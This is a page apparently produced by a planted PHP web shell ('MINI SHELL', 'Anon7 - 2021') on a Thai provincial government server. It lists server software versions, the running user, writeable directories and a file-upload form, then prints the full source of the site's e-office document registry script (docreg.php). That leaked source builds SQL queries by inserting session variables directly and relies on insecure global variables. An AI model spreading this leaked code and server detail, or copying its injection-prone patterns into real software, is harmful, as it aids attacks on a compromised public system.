MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/bin/document_v1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/bin/document_v1/docreg.php
<?
//include("chk_permission.php");
session_start();
include("../../config/config.inc.php");
include("../../common/function.php");
include("../../common/eoffice.inc.php");
include("../../common/common_system.inc.php"); 
$ApplicationName="document"; 
$time_start = getmicrotime();  
## session ระบบหนังสือรับส่ง
	session_register("session_permit");


// echo "<pre>"; print_r($_SESSION);// print_r($session_permit);

	# E-document system CONFIG
	$sql_con="SELECT * FROM docsys_config";
	$result_con = mysql_query($sql_con)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	while($rs_con = mysql_fetch_array($result_con)){
	$config[$rs_con[application]]=$rs_con[value];
	}


# CONNECTION FIX
// $app_id= 1;
 $app_id=(!$app_id)&&($type!="command")? "1":"16";

	if( $_SESSION["session_permit"]){
	if($session_apppermit[$app_id]){
		foreach($session_apppermit[$app_id] as $permit => $pvalue){
			$session_permit[$permit]=on;
		}
	}
	}
	
// print_r($_SESSION[session_permit]);	
	
$user=$_SESSION[session_staffid];
$type=$_GET[type];
if($type){$_SESSION[tab]=$type;}
if(!$type){$type=$_SESSION[type];}
$time_start = getmicrotime();


if( ($action) ){
include "docreg_action.php";
}
?>
<HTML>
<HEAD><TITLE>ระบบทะเบียนหนังสือ</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=windows-874">
<LINK href="../../common/style.css" rel="stylesheet" type="text/css">
<LINK href="../../common/tab_style.css" rel="stylesheet" type="text/css" />
<SCRIPT language="javascript" src="../../common/popcalendar.js"></SCRIPT>
<SCRIPT language="javascript" src="../../common/xmlhttp.js"></SCRIPT>
<SCRIPT type="text/javascript" src="../../common/tabber.js"></SCRIPT>


<LINK media=screen href="block_js/jq.css" type=text/css rel=stylesheet>
<LINK media=screen href="block_js/block.css" type=text/css rel=stylesheet>
<SCRIPT src="block_js/jquery-1.2.6.js" type=text/javaSCRIPT></SCRIPT>
<SCRIPT src="block_js/jquery.blockUI.js" type=text/javaSCRIPT></SCRIPT>
<SCRIPT type=text/javaSCRIPT>
// Effect funtion By P' NOI
function test() {
    $.ajax({ url: 'wait2.php', cache: false });
}
    $().ajaxStop($.unblockUI);
function loadfile(){
        $.blockUI();
        test();
}
</SCRIPT>

</HEAD>
<BODY topmargin="0" onLoad="loadfile();">
<?php 
	//echo '<pre>' ;
	//print_r($_SESSION);
	//echo'--------------------------------------------------------------------------------------';
	//print_r($_SESSION['session_apppermit'][16][10]);
?>

	<TABLE width="100%" border="0" cellspacing="0" cellpadding="0">
	<TR>
		<TD width="350" align="left"><IMG src="../control/head/samutsakhon/h-header.jpg" width="456" height="79"></TD>
		<TD align="right" background="../../images/h-lampang/h-lampang_02.png">&nbsp;</TD>
		<TD width="359" align="right" valign="bottom"><IMG src="../../images/h-lampang/h-lampang_03.jpg" width="387" height="79"></TD>
	</TR>
</TABLE>

<? include "doc_menu_bar.php"; ?>


<TABLE width="100%" border="0" cellspacing="0" cellpadding="0">
	<TR>
		<TD align="left">

<?



 if( ($session_permit[100]) || ($session_permit[200]) || ($session_permit[300])){ 
	 $time_start = getmicrotime();
### อ่านจากทั้งหมด
	 # นับ docid ที่ไม่ว่าง
	$sql_ac="
	SELECT
	Count(document.id) as num
	FROM
	document
	WHERE 
	document.docid is not null
	";
	$result_ac = mysql_query($sql_ac)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	$rs_ac = mysql_fetch_assoc($result_ac);

	 # นับ docid ตามประเภท จากทั้งหมด
	$sql_res="
	SELECT
	document.type,
	Count(document.id) as num
	FROM
	document
	WHERE 
	document.docid is not null
	GROUP by document.type
	";
	$result_res = mysql_query($sql_res)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	while($rs_res = mysql_fetch_assoc($result_res)){
	$doc_num[$rs_res[type]]=$rs_res[num];
	}


	$sql_allread="
	SELECT DISTINCT
	COUNT(doc_history.doc_action) as ALLNUMREAD
	FROM document Inner Join doc_history ON document.id = doc_history.docid
	WHERE doc_history.doc_action = 'view' AND doc_history.doc_owner = '$session_staffid'
	GROUP by doc_history.doc_owner
	";
	$result_allread = mysql_query($sql_allread)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	$rs_allread = mysql_fetch_assoc($result_allread);
			$time_end = getmicrotime(); writetime2db($timestart,$timeend);
}


 if( ($session_username!="root") && ((!$session_permit[100]) && (!$session_permit[200]) ) ){

	 $time_start = getmicrotime();
	$sql_read="
	SELECT
	Count(doc_receive.id) as num
	FROM
	doc_receive
	WHERE
	doc_receive.`status` =  '0' AND
	doc_receive.staff_id =  '$session_staffid'
	GROUP by doc_receive.staff_id
	";
	$result_read = mysql_query($sql_read)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	$rs_read = mysql_fetch_assoc($result_read);
		$time_end = getmicrotime();  writetime2db($timestart,$timeend);

	 $time_start = getmicrotime();


	$sql_all="
		SELECT
		doc_receive.docid
		FROM
		doc_receive 
		WHERE
			(doc_receive.`status` =  '0' AND doc_receive.staff_id =  '$session_staffid') 
		Union
		SELECT
		document.id
		FROM
		document 
		WHERE
		( document.owner = '$session_staffid') 
	";

	$sql_docrev="
		SELECT
		doc_receive.docid
		FROM
		doc_receive 
		WHERE
		(doc_receive.`status` =  '0' AND doc_receive.staff_id =  '$session_staffid') 
	";
	$result_all = mysql_query($sql_all)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	while($rs_doc=mysql_fetch_assoc($result_all)){
	
	}

		$sql_doc="
		SELECT
		document.id
		FROM
		document 
		WHERE
		( document.owner = '$session_staffid')
	";
	$result_all = mysql_query($sql_all)or die("Query line " . __LINE__ . " error<hr>".mysql_error());


	$result_all = mysql_query($sql_all)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	$rs_all[num] = mysql_num_rows($result_all);
		$time_end = getmicrotime();  writetime2db($timestart,$timeend);
		if($debug=="ON"){echo $sql_all;}
	}






if($type != "personal"){ // ปิดการแสดงผลในกรณีเลือกข้อมูลส่วนบุคคล
?>
<? if( ($session_username!="root") && ((!$session_permit[100]) && (!$session_permit[200]) && (!$session_permit[300])) ){?>
จำนวนหนังสือทั้งหมด <?=$rs_all[num]?> ฉบับ <? if($rs_read[num]) { echo "ยังไม่ได้อ่าน $rs_read[num] ฉบับ";}?>
<? }?>



<? if( ($session_permit[100]) || ($session_permit[200]) || ($session_permit[300])){ ?>
หนังสือในระบบ <?=$rs_ac[num]?> ฉบับ <?  if($rs_allread[ALLNUMREAD]) {?> ยังไม่ได้อ่าน <?=$rs_ac[num]-$rs_allread[ALLNUMREAD]?><? }?> 
[<? if($doc_num[get]){ ?>รับ :<?=$doc_num[get]?>&nbsp;<?}?>
<? if($doc_num[send]){ ?>ส่ง : <?=$doc_num[send]?>&nbsp;<?}?>
<? if($doc_num[circular]){ ?>เวียน : <?=$doc_num[circular]?>&nbsp;<?}?>
]<?
}// end if($type == "personal"){ // ปิดการแสดงผลในกรณีเลือกข้อมูลส่วนบุคคล
 }

 ?>

</TD>
		<TD align="right" valign="top">
			<? if($session_permit[10]=="on"){?>
			<A href="?type=system&action=autonumber">
			<IMG src="../../images/icon_blacklist_list.gif" width="16" height="16" border="0"></A>			
			<A href="../manage_application/privilage.php?app_id=<?=$app_id?>" target="_blank">
			<IMG src="../../images/icon_user.gif" border="0">			</A>
			<? } ?>
			<A href="?type=personal">ผู้ใช้ระบบ : 
			<?if($_SESSION[session_title]){echo "(".$_SESSION[session_title].")";}?>		
			<?=$_SESSION[session_fullname]?>		
			<? if($session_permit[300]){echo "[สารบรรณ]";}?>
		</A>		</TD>
	</TR>
	
	<TR>
		<TD height="420" colspan="2" align="left" valign="top">
	
	
	
	
<?
$time_start_A = getmicrotime();

if($type=="add"){include "add_select.php";}
if($action=="search"){include "docreg_search.php";}
if($type=="setting"){	include "docreg_profile_setting.php";}
if($_SESSION[session_username]!="root"){ 
if(($type=="get")||(!$type)||($type=="send")||($type=="all")||($type=="circular")||$type=="command"||$type=="secret"){
//		if ( (($type=="send")||($type=="all"))&&(!$session_permit[300]) ) {
//			$type="get";
//		}
			if(!$action){				
			include "docreg_getdart.php";   #    echo " <hr>  docreg_getdart    <hr>  ";
			}elseif( $action=="add"){
			include "docreg_addform.php";   #    echo " <hr>  docreg_addform    <hr>  ";
			}elseif($action=="edit"){
			include "docreg_getform.php";     #  echo " <hr>    docreg_getform  <hr>  ";
			}elseif( $action=="view" ){
			include "docreg_getview.php";     #  echo " <hr> docreg_getview     <hr>  ";
			}elseif( $action=="activity" ){
			include "docreg_getact.php";     #  echo " <hr>   docreg_getact   <hr>  ";
			}elseif( $action=="confirm" ){
			include "docreg_confirm.php";    #   echo " <hr>   docreg_confirm   <hr>  ";
			}elseif( $action=="add_past" ){
			include "docreg_passform.php";    #   echo " <hr>   docreg_passform   <hr>  ";
			}
	}
if($type == "personal"){ // แก้ไขข้อมูลส่วนบุคคล
	include("user_properties.php");
}// end / แก้ไขข้อมูลส่วนบุคคล
if($type=="profile"){ 	 $type="profile"; //		<!--<H2>ระบบบริหารจัดการ Profile Manager</H2>--><BR>
	 	include "docreg_profile.php";  
	}
}
 if($session_permit[10]){ 
 if($type=="system"){ 
 $type="system";
 include "docreg_user_menu.php";  
	 }
}
if($type == "report"){ // แก้ไขข้อมูลส่วนบุคคล
	include("doc_report.php");
}// end // แก้ไขข้อมูลส่วนบุคคล
$time_end_A = getmicrotime(); writetime2db($timestart,$timeend);
?>

</TD>
	</TR>
		<TR>
		<TD colspan="2">
		<TABLE width="100%" border="0" cellspacing="0" cellpadding="0">
	<TR>
		<TD colspan="2" align="left">&nbsp;</TD>
		</TR>
	<TR>
		<TD align="left">&nbsp;</TD>
		<TD align="right">&nbsp;</TD>
	</TR>
</TABLE>
</BODY>
</HTML>
<? 
//insert timeQuery
 $time_end = getmicrotime();
 writetime2db($timestart,$timeend);
//insert timeQuery
?>

Anon7 - 2021